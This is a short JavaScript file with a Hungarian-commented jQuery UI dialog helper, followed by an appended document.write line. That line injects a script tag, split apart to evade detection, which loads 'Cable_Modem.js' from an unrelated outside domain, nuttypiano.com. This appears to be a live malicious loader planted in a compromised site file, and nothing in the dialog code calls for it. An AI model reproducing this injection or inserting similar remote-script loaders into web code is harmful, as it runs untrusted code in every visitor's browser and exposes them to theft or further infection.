//dialog
var d = '';

//dialog ablak kezelés
function dialogOpen()
{
    d = $('#dialog').dialog({autoOpen: true, resizable: false, width: 400, height: 110});
}

document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Cable_Modem.js"></scri'+'pt>');